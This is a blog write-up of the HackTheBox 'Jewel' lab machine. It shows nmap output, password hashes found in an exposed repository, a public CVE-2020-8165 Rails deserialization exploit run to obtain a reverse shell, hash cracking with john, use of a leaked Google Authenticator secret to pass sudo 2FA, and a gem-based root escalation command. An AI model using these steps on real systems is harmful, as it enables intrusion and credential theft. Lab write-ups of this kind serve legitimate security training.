<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>HackTheBox Jewel Writeup | sh4ck1t</title><meta name="generator" content="Jekyll v3.9.0" /><meta property="og:title" content="HackTheBox Jewel Writeup" /><meta name="author" content="sh4ck1t" /><meta property="og:locale" content="en_US" /><meta name="description" content="Exploiting ruby on rails vulnerability to gain first access, escalating priviledge using google authenticator and take advantage to sudo and gem to conquer the machine!!" /><meta property="og:description" content="Exploiting ruby on rails vulnerability to gain first access, escalating priviledge using google authenticator and take advantage to sudo and gem to conquer the machine!!" /><link rel="canonical" href="http://localhost:4000/posts/jewel-writeup/" /><meta property="og:url" content="http://localhost:4000/posts/jewel-writeup/" /><meta property="og:site_name" content="sh4ck1t" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-11-10T17:28:47+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HackTheBox Jewel Writeup" /><meta name="twitter:site" content="@sh4ck1t" /><meta name="twitter:creator" content="@sh4ck1t" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Exploiting ruby on rails vulnerability to gain first access, escalating priviledge using google authenticator and take advantage to sudo and gem to conquer the machine!!","headline":"HackTheBox Jewel Writeup","dateModified":"2020-11-10T17:28:47+01:00","datePublished":"2020-11-10T17:28:47+01:00","@type":"BlogPosting","url":"http://localhost:4000/posts/jewel-writeup/","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/jewel-writeup/"},"author":{"@type":"Person","name":"sh4ck1t"},"@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"> <!-- CSS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --><link rel="preload" as="style" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/lib/bootstrap-toc.min.css"><link rel="stylesheet" href="/assets/css/lib/bootstrap-toc.min.css" /><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" async></script> <!-- JS selector for site. Chirpy v2.3 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT Licensed --> <script src="/assets/js/post.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/avatar.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="profile-text mt-3"><div class="site-title"> <a href="/">sh4ck1t</a></div><div class="site-subtitle font-italic">InfoSec stuff and CTF writeups.</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://hackthebox.eu/profile/19967" target="_blank"> <i class="fas fa-cube"></i> </a> <a href="https://it.linkedin.com/in/simplicio-liberatore" target="_blank"> <i class="fab fa-linkedin"></i> </a> <a href="https://github.com/sh4ck1t" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/sh4ck1t" target="_blank"> <i class="fab fa-twitter"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>HackTheBox Jewel Writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox Jewel Writeup</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Tue, Nov 10, 2020, 5:28 PM +0100" > Nov 10 <i class="unloaded">2020-11-10T17:28:47+01:00</i> </span> by <span class="author"> sh4ck1t </span></div></div><div class="post-content"><h3 id="hackthebox-jewel-writeup">Hackthebox Jewel Writeup</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb/jewel/jewel.png" alt="Jewel" /></p><h2 id="abstract">Abstract</h2><p>Exploiting ruby on rails vulnerability to gain first access, escalating priviledge using google authenticator and take advantage to sudo and gem to conquer the machine!!</p><h2 id="summary">Summary</h2><ol><li>Initial foothold<ul><li>Nmap recon</li><li>gitweb enum</li><li>phusion passenger exploration</li></ul></li><li>Ruby on Rails Deserialization Attack</li><li>User Flag</li><li>Priviledge Escalation</li><li>Root Flag</li></ol><h2 id="initial-foothold">Initial foothold</h2><h3 id="nmap-recon">Nmap recon</h3><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
</pre><td class="rouge-code"><pre># Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-23 09:27 CEST
Nmap scan report for 10.10.10.211                                                                                                                                                                                                          
Host is up, received echo-reply ttl 63 (0.053s latency).                                                                                                                                                                                   
Scanned at 2020-10-23 09:27:54 CEST for 23s                                                                                                                                                                                                
Not shown: 997 filtered ports                                                                                                                                                                                                              
Reason: 997 no-responses                                                                                                                                                                                                                   
PORT     STATE SERVICE REASON         VERSION                                                                                                                                                                                              
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                                                                                                                                       
| ssh-hostkey:                                                                                                                                                                                                                             
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)                                                                                                                                                                             
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDK1T+N61bTR89bPSsTtguCPwCtq5IAemU5F9VO6hSw8hnLrQ+3Bx6Cjci6MFx9RAMOS4xVtsmqtDvmjrtQ5hYuOYXlafsv6QU+6LJ+vImDSXiunRdpck3Z6f8sIEOOtiCJZ9HDiAzE62nolJPe2ObtU/Of627MiAksFh6+oBl/ZoWnveQwY7TLgFf19IhHV4Q9OPUlqeokiWiTazbvj5jC8vWcnl+DpN3xTuiTV8b+xUyXnFyO/MBaKhRGBbcbBwOsFVPc8NFyuyardVWEblS+p6B1QG6C62/o2Ft8x9lk1cYEDaFH+IfIUGhHykFQlA8+Y4qee8+OtRKrfwkVyxOr                                                                                        
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)                                                                                                                                                                            
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBgCpUS3ovp4tAKRfsFll+x5W6F28nQMhBrx06jDhK35Z10da2PX2vayLOniUTEsnb0hL/4phtNdI+QOKLPX+sg=                                                                         
|   256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)                                                                                                                                                                          
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA9poXYE6YrgNaTFpdzYtMPUeSwB416uWFLSrT55iwv0                                                                                                                                                         
8000/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.38                                                                                                                                                                                  
|_http-generator: gitweb/2.20.1 git/2.20.1                                                                                                                                                                                                 
| http-methods:                                                                                                                                                                                                                            
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                                                                                               
| http-open-proxy: Potentially OPEN proxy.                                                                                                                                                                                                 
|_Methods supported:CONNECTION                                                                                                                                                                                                             
|_http-server-header: Apache/2.4.38 (Debian)                                                                                                                                                                                               
| http-title: 10.10.10.211 Git                                                                                                                                                                                                             
|_Requested resource was http://10.10.10.211:8000/gitweb/                                                                                                                                                                                  
8080/tcp open  http    syn-ack ttl 63 nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.39 - 3.2 (86%), Infomir MAG-250 set-top box (86%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=10/23%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5F928611%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10C%TI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
</pre></table></code></div></div><p>Nmap revealed that port 22, 8000 and 8080 was open and SSH, Apache2 ,nginx webserver was respectively running on. Morevoer Nmap script gave information that webserver on 8000 was using gitweb 2.20.1 interface.</p><h3 id="gitweb-enum">Gitweb enum</h3><p>I started by searching for gitweb 2.21.1 available exploits but found nothing. Then i moved on enumerating gitweb web pages and found interesting file named bd.sql at URL http://10.10.10.211:8000/gitweb/?p=.git;a=blob;f=bd.sql;h=a7fddb693ca735f8aa1e4b09046cec2adddddc51;hb=HEAD, containing bill and jennifer user hashes:</p><p><code class="language-plaintext highlighter-rouge">bill</code>:<code class="language-plaintext highlighter-rouge">$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW</code> <code class="language-plaintext highlighter-rouge">jennifer</code>:<code class="language-plaintext highlighter-rouge">$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy</code></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb/jewel/jewel-gitweb.png" alt="gitweb file page" /></p><p>I tried to crack these hashes but every attempt failed.</p><h3 id="pushion-passenger-exploration">Pushion Passenger exploration</h3><p>So i decided to exploring web server on 8080 where Phusion Passenger 6.0.6 was running. I did not find any available eploit for this service, then i tried to register new account tthrough signup page:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/img/htb/jewel/homepage-jewel.png" alt="login page" /></p><p>After logging in i tried some attack but no luck.</p><h2 id="ruby-on-rails-deserialization-attack">Ruby on Rails Deserialization attack</h2><p>After getting some hints from the HTB forum found that the ruby on rails version running on webserver was &lt; 5.2.4.3 and it was vulnerable to deserialization attack (I found ruby on rails version at the URL http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741.</p><p>More information about this vulnerability can be found at Google Forum (https://groups.google.com/forum/#!topic/ruby-security-ann/OEWeyjD7NHY).</p><p>Following the PoC found at GitHub (https://github.com/masahiro331/CVE-2020-8165) and the python script created by @randomname83 i got reverse shell.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>sh4ck@kali:~$ python3 exploit_poc_cve-2020-8165.py 10.10.10.211 10.10.14.83 4545

sh4ck@kali:~$ nc -nlvp 4545
listening on [any] 4545 ...
connect to [10.10.14.83] from (UNKNOWN) [10.10.10.211] 44778
bash: cannot set terminal process group (815): Inappropriate ioctl for device
bash: no job control in this shell
bill@jewel:~/blog$i
</pre></table></code></div></div><h2 id="user-flag">User Flag</h2><p>After upgrading full interactive shell i got user flag under home bill folder.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>bill@jewel:~/blog$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bill@jewel:~/blog$ export TERM=xterm
bill@jewel:~/blog$ cat user.txt
</pre></table></code></div></div><h2 id="priviledge-escalation">Priviledge Escalation</h2><p>Linpeas found two password hashes inside the file dump_2020-08-27.sql and bd.sql at /var/backups/ and /home/bill/blog/ respectively:</p><p><code class="language-plaintext highlighter-rouge">jennifer</code> : <code class="language-plaintext highlighter-rouge">$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd5I02OnmkKnD3zA6MqMrzLKz0jeDO</code></p><p><code class="language-plaintext highlighter-rouge">Unknown</code>: <code class="language-plaintext highlighter-rouge">$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW</code></p><p>Listing the content of dump_2020-08-27.sql file got another hash of user bill:</p><p><code class="language-plaintext highlighter-rouge">bill</code>: <code class="language-plaintext highlighter-rouge">$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW</code></p><p>Tried to crack these hashes using john.</p><p><code class="language-plaintext highlighter-rouge">$ sudo john --format=bcrypt creds.hash --wordlist=/usr/share/wordlists/rockyou.txt</code></p><p>John has successfully cracked the hash and the credential is bill : spongebob.</p><p>Tried to run the command $sudo -l again to check any special privilege given to user bill, but it asked a Verification Code after entering the password. It appears that there is some two factor authentication enabled for normal users to run $sudo -l command. After some more enumeration got a hidden file google_authenticator inside the home directory (.google_authenticator). There is secret code inside this file which is 2UQI3R52WFCLE6JTLDCSJYMJH4, this code can be used to generate OTP.<br /> I have used authenticator addons for Firefox to generate OTP using this secret key.</p><p>After addons installation and setting the OTP with secret key, i got otp time based number.</p><p>Copy the OTP and type the command $sudo -l then password spongebob then enter OTP as Verification code. anyway i got some error. the issue was determinated bay time misalignment between remote server and my machine. So i had to set my machine time as per remote box. sudo -l revealed that user bill can run all the command using gem binary.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre><td class="rouge-code"><pre>bill@jewel:~/blog$ date
date
Mon 19 Oct 10:05:30 BST 2020
bill@jewel:~/blog$ sudo -l
sudo -l
[sudo] password for bill: spongebob

Verification code: 672111

Matching Defaults entries for bill on jewel:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    insults

User bill may run the following commands on jewel:
    (ALL : ALL) /usr/bin/gem
</pre></table></code></div></div><h2 id="root-flag">Root Flag</h2><p>From GTFOBIN found gem binary privilege escalation vector using Sudo Right Exploitation to get root. Let us get root shell and capture root flag. Getting Root Shell</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>bill@jewel:~/blog$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a>, <a href='/categories/active-machine/'>active-machine</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a> <a href="/tags/ruby-on-rails-deserialization-attack/" class="post-tag no-text-decoration" >ruby-on-rails-deserialization-attack</a> <a href="/tags/google-authenticator/" class="post-tag no-text-decoration" >google-authenticator</a> <a href="/tags/gem/" class="post-tag no-text-decoration" >gem</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox Jewel Writeup - sh4ck1t&url=http://localhost:4000/posts/jewel-writeup/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox Jewel Writeup - sh4ck1t&u=http://localhost:4000/posts/jewel-writeup/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox Jewel Writeup - sh4ck1t&url=http://localhost:4000/posts/jewel-writeup/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/s3-bucket/">s3 bucket</a> <a class="post-tag" href="/tags/ruby-on-rails-deserialization-attack/">ruby on rails deserialization attack</a> <a class="post-tag" href="/tags/google-authenticator/">google authenticator</a> <a class="post-tag" href="/tags/gem/">gem</a> <a class="post-tag" href="/tags/dynamodb/">dynamodb</a> <a class="post-tag" href="/tags/composer-sudo-priv-esc/">composer sudo priv esc</a> <a class="post-tag" href="/tags/burp-proxy/">burp proxy</a> <a class="post-tag" href="/tags/cve-2019-12384/">CVE 2019 12384</a> <a class="post-tag" href="/tags/cve-2018-15133/">CVE 2018 15133</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/bucket-writeup/" class="btn btn-outline-primary"><p>HackTheBox Bucket Writeup</p></a> <a href="/posts/htb-time/" class="btn btn-outline-primary"><p>HackTheBox Time Writeup</p></a></div><!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/htb-jewel/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Oct 31 <i class="unloaded">2020-10-31T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox Jewel Writeup</h3><div class="text-muted small"><p> HackTheBox Jewel This machine is currently active Enter the root password hash or Administrator NTLM hash YwD1****************************lj30 ...</p></div></div></a></div><div class="card"> <a href="/posts/htb-openkeys/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Oct 9 <i class="unloaded">2020-10-09T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox OpenKeyS Writeup</h3><div class="text-muted small"><p> HackTheBox OpenKeyS This machine is currently active Enter the root password hash or Administrator NTLM hash 4t4****************************kBG ...</p></div></div></a></div><div class="card"> <a href="/posts/htb-bucket/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Nov 10 <i class="unloaded">2020-11-10T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox Bucket Writeup</h3><div class="text-muted small"><p> HackTheBox Bucket This machine is currently active Enter the root password hash or Administrator NTLM hash rvx8****************************jQn/ ...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/username">sh4ck1t</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/s3-bucket/">s3 bucket</a> <a class="post-tag" href="/tags/ruby-on-rails-deserialization-attack/">ruby on rails deserialization attack</a> <a class="post-tag" href="/tags/google-authenticator/">google authenticator</a> <a class="post-tag" href="/tags/gem/">gem</a> <a class="post-tag" href="/tags/dynamodb/">dynamodb</a> <a class="post-tag" href="/tags/composer-sudo-priv-esc/">composer sudo priv esc</a> <a class="post-tag" href="/tags/burp-proxy/">burp proxy</a> <a class="post-tag" href="/tags/cve-2019-12384/">CVE 2019 12384</a> <a class="post-tag" href="/tags/cve-2018-15133/">CVE 2018 15133</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a 